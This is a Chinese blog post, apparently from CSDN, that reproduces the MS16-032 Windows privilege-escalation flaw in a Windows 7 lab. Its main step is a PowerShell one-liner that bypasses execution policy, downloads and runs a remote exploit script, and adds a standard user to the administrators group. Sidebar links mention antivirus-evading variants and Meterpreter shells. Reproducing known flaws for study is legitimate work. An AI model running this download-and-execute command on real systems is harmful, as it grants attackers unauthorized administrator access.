MS16-032 提权 漏洞复现

最新推荐文章于 2023-03-04 14:21:12 发布
最新推荐文章于 2023-03-04 14:21:12 发布
阅读量2.1k 收藏 8
点赞数 2
分类专栏: 漏洞复现 渗透测试 文章标签: MS16-032 渗透测试 提权漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Adminxe/article/details/106754010
版权

exploit-db的详情: https://www.exploit-db.com/exploits/39574/

注意点:此漏洞影响从Vista到Windows 10的所有Windows版本(包括服务器版本)以及为了实现利用,因为PowerShell脚本指示需要满足以下要求:目标系统需要有2个以上的CPU核心 PowerShell v2.0及更高版本必须正在运行

此漏洞会影响以下Microsoft产品:

Windows Vista 
Windows 7
Windows 8.1
Windows 10 
Windows 2008 Server 
Windows 2012 Server

复现测试的版本是Windows 7,其他的没有测试,可以自行进行测试;漏洞测试0x01使用标准用户登陆win7,下图是当前登录用户px的详细信息

0x02在powershell里面,直接执行命令进行提权,简单粗暴

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators px /add'"

0x03下面就是见证奇迹的时刻了

漏洞利用成功,有好几种方式,这只是其中一种。下面也是一种权限提升的方式,简单写一下脚本的下载下载地址:https://www.exploit-db.com/exploits/39719/

转载请注明:Adminxe's Blog » MS16-032 提权 漏洞复现

Adminxe
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
signature=a1dc0a47bc26fdf907849612b9b06669,MS13-002:Microsoft XML Core Services 中的漏洞可能允许远程代码执行:2013 ...
weixin_33736666的博客
05-30 4703
msxml4-KB2758694-chs.exe2DDE9F5A537F2A5A4B99B080BD480F09F9C2AD7E4FA29B4B1AEFD081EA26E5BA3C2AF4988D75433C4D0A8BE253DC6BA627FD45A8msxml4-KB2758694-cht.exeC146AE38CE2CBC39E4311D03060A9B0F57BE83CF8FE35519...
ms16032免杀版
10-11
ms16032免杀版 提权利器
MS16-032 提权
prettyX的博客
06-16 1004
MS16-032 补丁编号:KB3139914 影响系统版本:Windows Vista、Windows 7、Windows 8.1、Windows 10、Windows 2008 Server、Windows 2012 Server 漏洞下载地址:https://www.exploit-db.com/exploits/39719 系统要求:系统至少有2个以上CPU核心,否则利用脚本无法运行;PowerShell v2.0及以上版本 测试命令: powershell.exe -exec byp
ms16-032本地溢出漏洞
最新发布
06-27
ms16-032本地溢出漏洞
QD77MS16 范例程序
03-17
QD77MS16 范例程序,本人上机测试过
【安全】靶场实战-通过MS16-032提权
03-04 910
漏洞影响从Vista到Windows 10的所有Windows版本(包括服务器版本)。Windows 7Windows 10目标系统需要有2个以上的CPU核心。PowerShell v2.0及更高版本必须正在运行。可根据MS16-032(KB3139914)补丁是否安装,来判断当前版本是否可利用。
MS16-072导致WINDOWS 2008 2012基于用户过滤的组策略大面积失效
weixin_34278190的博客
10-15 150
最近发现很多,用户组策略失效,发现他们有一个共同的特点,就是他们使用的用户过滤,将默认的,Authernticated users从Security filtering中去掉,加入了相应的应该适用此组策略的特定用户或组。后来相了很久才发现是微软的安全更新改变了应用组策略的方法。安全更新是MS16-072 日期是:2016 06 14https://support.micros...
Metasploit学习笔记(五)——Meterpreter后渗透之WMIC实战MS16-032本地溢出漏洞
Zichel77的博客
10-09 1294
比如KiTrap0D (KB979682) 、MS11-011 (KB2393802) 、MS11-080(KB2592799),然后使用没有编。因为虚拟机不怎么打补丁,所以我们可以使用很多EXP来提权,这里就用最新的MS16-032来尝试提权,对应的编号是KB3139914。可以看到目标机只打了3个补丁,要注意这些输出的结果是不能被直接利用的,使用的方式是去找提权的EXP,然后将系统已经安装的补。过程简单来说就是这几步,成功利用反弹shell后就是Meterpreter了。在WIN7中查看补丁信息。
利用WMIC实战MS16-032本地溢出漏洞
岁月净好
11-29 3081
假设此处我们通过了一系列的渗透测试得到了目标机器的Meterpreter Shell.   首先输入getuid命令查看已经获得的权限,可以看到现在的权限很低,是test权限。 meterpreter > getuid Server username:WIN-S7TJ4B561MT\test 尝试输入getsystem命令提权,结果失败。 meterpreter > getsystem 接着查看系统的已达补丁,传统的方法是在目标机的CMD命令行下输入systeminfo命令,或者通过查
MS16-032 漏洞复现
EC_Carrot的博客
04-07 606
漏洞背景 Secondary Logon Service是其中的一个辅助登录服务。 Microsoft Windows的辅助登录服务存在特权提升漏洞,该漏洞源于程序没有正确管理内存中的请求句柄。本地攻击者可利用该漏洞以管理员身份运行任意代码。 微软在2016年3月8日已经更新了该漏洞的补丁文件KB3139914 影响范围 Microsoft Windows Vista SP2 Windows Server 2008 SP2和R2 SP1 Windows 7 SP1 Windows 8.1 Windows
2019 K8最新渗透测试工具集合.zip
05-22
K8信息安全工具包功能有: K8浏览器 K8木马病毒后门监视器 K8_VBS提权脚本免杀生成器 K8破壳SMTP K8正方密码解密工具 破文生成 搜索引擎 加密解密 在线翻译渗透命令 渗透工具 系统加强 网吧攻防 小红伞 漏洞 EXP 网络安全检测 必备的综合工具
三菱PLC QD77MS QD77MS16定位模块视频 编程讲解教程+使用手册+程序样例.zip
06-15
第4集 QD77ms视频教程 MS2 ms4 MS16的JOG及原点程序讲解 第5集 定位控制的几种方式 第6集 让马达按规定速度一直转动 一直正转或者反转 第7集 中途走了一节 停止了 如何重新启动 第8集 当前定位数据监控 和如何将当前...
M_D77MS16 FB库
11-23
M_D77MS16 FB库 M_D77MS16 FB库 M_D77MS16 FB库 M_D77MS16 FB库
QD77MS2 QD77MS4 QD77MS16用户手册.pdf
05-27
三菱定位模块,QD77MS2 QD77MS4 QD77MS16中文用户手册
综合扫描 -- Ladon
weixin_41489908的博客
01-27 1887
将喜欢的东西留在身边,这就是努力的意义。。。 ---- 网易云热评 一、软件介绍 大型内网渗透扫描器&Cobalt Strike,Ladon7.2内置94个模块,包含信息收集/存活主机/端口扫描/服务识别/密码爆破/漏洞检测/漏洞利用。漏洞检测含MS17010/SMBGhost/Weblogic/ActiveMQ/Tomcat/Struts2,密码口令爆破(Mysql/Oracle/MSSQL)/FTP/SSH(Linux)/VNC/Windows(IPC/WMI/SMB/Netbio..
参加历年网络安全竞赛wp(2022年起持续更新)
苦行僧的妖孽日常
10-24 2399
参加历年网络安全竞赛wp(2022年起持续更新)
权限提升学习
qq_41672971的博客
12-24 1166
1111111111111111
文件上传漏洞-upload_labs
黑白的博客
12-13 1798
声明 学习文件上传漏洞 第一关 源码分析 可以看到allow_ext是黑名单,只允许jpg,png和gif进行,在前端进行校验,通过将文件名,截取文件名点.后面的后缀和这个黑名单进行比较 function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!");
6.Xray工具可以发现下面哪种漏洞(2分) A.XSS B.shiro C. ms17-017 D. ms16-075
06-13
正确答案是 A。Xray 是一款功能强大的 Web 漏洞扫描工具,可以发现多种类型的漏洞,包括 XSS、SQL 注入、文件包含等。而在选项中,只有 XSS 漏洞是可以被 Xray 发现的,其他的漏洞类型不在 Xray 的扫描范围之内。因此,选项 A 是正确答案。选项 B 中的 shiro 是一个 Java 安全框架,不是漏洞类型。选项 C 和 D 中的 ms17-017 和 ms16-075 是 Windows 操作系统的漏洞编号,也不是漏洞类型。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值